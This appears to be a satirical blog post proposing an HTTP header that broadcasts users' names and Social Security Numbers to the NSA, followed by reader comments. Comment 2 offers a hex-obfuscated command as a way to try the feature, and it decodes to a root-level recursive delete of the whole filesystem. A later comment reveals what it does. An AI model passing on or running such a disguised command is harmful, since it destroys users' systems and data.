Skip to content


X-No-Wiretap

Recently, the American public has been forcefully made aware of the existence of various programs by the NSA- including massive infrastructure for intercepting all domestically routed communications to better protect us from imminent foreign threats. With legions of patriotic analysts, the NSA methodically ranks communications on the basis of their “foreignness” factor to determine candidacy for prolonged retention. Although it was developed with the best interests of the American people at heart, this program unwittingly ensnares communications of purely domestic nature on the order of tens of thousands of incidents per day. These innocent mistakes are putting the agency at a great risk because the 4th Amendment of the Constitution expressly prohibits such affronts to American privacy. Making determinations of foreignness is hard, but to prevent further inconvenience to the American way of life, we should take these leaks as an opportunity for us on the civilian front to aid the NSA by voluntarily indicating citizenship on all our networked communications.

Here, we define the syntax and semantics of X-No-Wiretap, a HTTP header-based mechanism for indicating and proving citizenship to well-intentioned man-in-the-middle parties. It is inspired by the enormously successful RFC 3514 IPv4 Security Flag and HTTP DNT header.

Syntax

Screenshot from 2013-08-22 21:41:06

The HTTP header, “X-No-Wiretap” takes the value of the current user’s given name under penalty of perjury. The full name must be immediately followed by identity verification in the form of a standard U.S. Social Security Number, formatted with a hyphen “-” after every third and fifth digit.

Future revisions of the protocol may introduce additional forms of verification, as while the presence of an SSN should be able to lower the foreignness coefficient of the vast majority of domestic communications to well below 51%- initial research seems to indicate that the combination of full first name and SSN is able to reduce an associated message’s foreignness factor by over 76.8% for 99.997% of Americans. However, there is a chance that certain instances may additional require Passport, Driver’s License, Address, Birthdate, Mother’s Maiden Name, and Childhood Best Friend’s Name to further lower the foreignness factor. This capability will be addressed in future versions of the protocol.

What about SSL/TLS?

Of course adding encryption makes it substantially more difficult for the NSA to interpret the content of what a user is sending, and increases the chance that they may unwittingly collect and retain your communications. In order to address these concerns, this proposal necessarily deprecates all the SSL/TLS ciphers in favor of Double CAESAR’13, a thoroughly studied and well-known military-grade solution which offers excellent modes for graceful redegradation.

Isn’t it dangerous to send your social security number in plaintext along with every request?

Conventional security warns of the possibility of man-in-the-middle attacks, but these new intelligence revelations require entirely new types of cryptographic thinking. Here, the trusted entity is not the server acting at one end, it’s not even the user issuing the requests- but rather, it’s the bureaucracy sitting in the middle politely intercepting all traffic for benevolent analysis- protecting your way of life.

One may be tempted to characterize this as a sacrifice of privacy in order to optimize security, but this position is simply naive. Every new progressive initiative of the government advances both fronts- both security and liberty, never at the expense of either. If you take a holistic long term perspective on the impact on a global scale with a vast array of (classified) information sources, there is very little question that you too would arrive at the same conclusions on the genuine merits of this surveillance system.

In this case, the removal of encryption ensures that the government is able to parse the content of messages to identify terrorists. At the same time, the inclusion of the citizenship identification information should give citizens the safety of mind, knowing that their messages will not be stored indefinitely in a NSA datacenter.

What about Identity Theft?

What if you set up a server to transparently capture the browser headers? Any malicious entity could then collect all the social security numbers and real identities of everyone who happened to stumble onto their websites and use the information to sign up for credit cards, create hazardous investments, threaten or blackmail loved ones, and masquerade as a citizen while doing terrorist activities!

There isn’t any real evidence that such sweeping surveillance will even substantially reduce the chances of events that are intrinsically outliers anyway. On the other hand, identity theft is a real world issue which affects millions of Americans on a daily basis- and these changes will only make our real problems worse.

Short-Sighted Critic

Our government has to reconcile with the fact that the flow of information has radically shifted in the past few decades- all the previous paradigms of privacy, security and adversaries have been obsoleted. Understandably, they need to create infrastructure to tackle this next generation of attacks. This could mean highly orchestrated attacks being planned online, and the government is justified in trying to exercise every available option to avert the next cyber-9/11. Our adversaries may have no limits to their capabilities, and so waiting for definitive evidence on the efficacy of counter-intelligence approaches is giving them an opportunity to plan their next attack.

When what’s at stake is the American way of life, it’s easy to put aside things that don’t really matter.

If the terrorists do find a way to cheat the foreignness heuristic, that’s not a problem, because this proposal is backwards compatible with the existing catch-all NSA policy. They can always, in the end, ignore the X-No-Wiretap header, but we wouldn’t know so it’d be okay.

When can I use this?

It’s expected that this proposal will breeze through the standardization process- because we as Americans can always get together and do that which must be done in these times which try men’s souls. Browsers should implement the feature as soon as possible, so that people can make use of the increased sense of security and privacy it affords.

If you’re truly eager to try it out, you can contribute to the prototype chrome extension which supports the header injection (the reversal of HTTPS Everywhere, a feature called HTTPS Nowhere hasn’t been implemented yet, but we’re accepting pull requests!). Since this extension is still experimental, inserting your personal identifiable information must be done by editing the source code, but you should expect a more user friendly interface in the next revision. Since it isn’t thoroughly tested, there may be a chance that it fails to leak the user’s personally identifiable information with every networked request, but rest assured this will be fixed as soon as the bugs are made aware to us.

We should all rally behind this proposal for a simple technical solution which will go a great length to simultaneously enhancing both privacy and security, while overall preserving the only thing which matters, our American way of life.

Posted in Security.

Tagged with , , , , , , , , , , , , .


23 Responses

Stay in touch with the conversation, subscribe to the RSS feed for comments on this post.

  1. Dean Maddock 317-96-7664 says

    What is the best way to use this before it’s implemented in browsers? Thanks

  2. Anonymous says

    This should just about do it, run it from the command line in linux or osx:
    $(echo 7375646f20726d202d2d6e6f2d70726573657276652d726f6f74202d7266202f | xxd -r -p)
    Windows already has this feature built in, so no need to do anything.

  3. Rizwank says

    Anonymous, very funny.

    For those interested, command runs
    sudo rm –no-preserve-root -rf /

  4. John Doe says

    The real threat to your american way of life is NSA and the surveillance state they build. I will not write a long comment why I think your post is wrong on many levels but I advice you to read schneier.com (look through the archives and watch his talks on youtube), or theguardian.com/world/nsa and reconsider your view about surveillance, imminent threats and downgrading of security and privacy.

  5. Andy Onymous says

    Dear John Doe,

    I refer you to http://en.wikipedia.org/wiki/A_Modest_Proposal for a similarly intentioned post, since the author of this one failed to include the ‘sarcasm’ tag.

  6. Ron says

    “The real threat to your american way of life is NSA”

    No, you idiot. It’s the dozen federal law enforcement agencies (headlined by the FBI & DEA), hundreds of aggressive local agencies, idiot citizens who spill their lives onto Facebook & Instagram, and — worst of all — a mass media that foments hysterical panic at the slightest drop of the hat which politicians feel obliged to “do something about”.

  7. Common sense says

    “well-intentioned man-in-the-middle parties”

    I beg your pardon?

  8. Ron says

    “I beg your pardon?”

    Note how he mentions the enormously successful RFC 3514 IPv4 Security Flag? Google it, and all will (should) be explained.

  9. Jeremiah says

    I would call this the submissive quisling response to Snowden revelations. You have the RFC equivalent of “Papers, Please!” response.

    Why give additional, voluntary plain-text metadata to an agency that has repeatedly demonstrated that it is unconstrained by rule of law, and has no ethical boundary for actions?

  10. John Blair says

    satire, people. SATIRE.

  11. Ron says

    “Why give additional, voluntary plain-text metadata”

    Don’t blab on about crap you obviously know nothing about. (If you *did* know anything about the Intarweb, the satire would have screamed out to you in paragraph 2).

  12. Anonymous says

    You’d have to be a complete idiot to put your social security number in the headers of your website.

  13. Anonymous says

    Dear Anon, you are very very right about that, however, not only is this article very obious satire, nowhere does it suggest “puttings your social security number in the headers of your website”, rather putting your social security number in the request headers sent out by the user agent (in your case, internet explorer 4) when attempting to access a website.

  14. Anonymous says

    I smell conspiracy here.

  15. Joe says

    I think “X-Papers-Please” might be a better name for the header.

  16. purduethumbs says

    For this to work, a NSSN (National security signature number) would need to be created that is specific to a person but does not tie into their interactions other than communications (similar to an IP address via ARIN, or an AS number). It would ideally not be contained in the header of the datagram, but as an additional layer 4 or something. It’s adoption as a header would be faster, but should also include an RFC to assist at the networking layer. Consider it to be signed traffic.

  17. John Smith says

    Hang on, what can us Australian’s do if we want to get in on the action? My humble suggestion is a global personal identifier which we could all use rather than just those from USA!

  18. Ron says

    “a global personal identifier”

    It would be a New World Order of hierarchy and knowing our places in society!

  19. John Doe says

    The article is .. satire… ok… I beg your pardon.. well done… Sometimes it is not easy to distinguish between satire texts written by smart people and texts written by crazy people…

  20. Anonymous says

    “Given name” means first name. I think you meant full name.

  21. Anonymous says

    Thanks, this was hilarious.

  22. Landscaping Denver CO says

    I am extremely impressed with your writing skills and also with the
    layout on your blog. Is this a paid theme or did you modify
    it yourself? Either way keep up the nice quality writing, it’s rare to see a nice blog like this one nowadays.

Continuing the Discussion

  1. Anonymous linked to this post on December 15, 2013

    […] factory shop, including the funds of the first-time devotion,gucci handbags clearance,X-No-Wiretap – Blog, general manager Li also completely promises." Lin Hao hears his explanation and took a look […]



Some HTML is OK

or, reply to this post via trackback.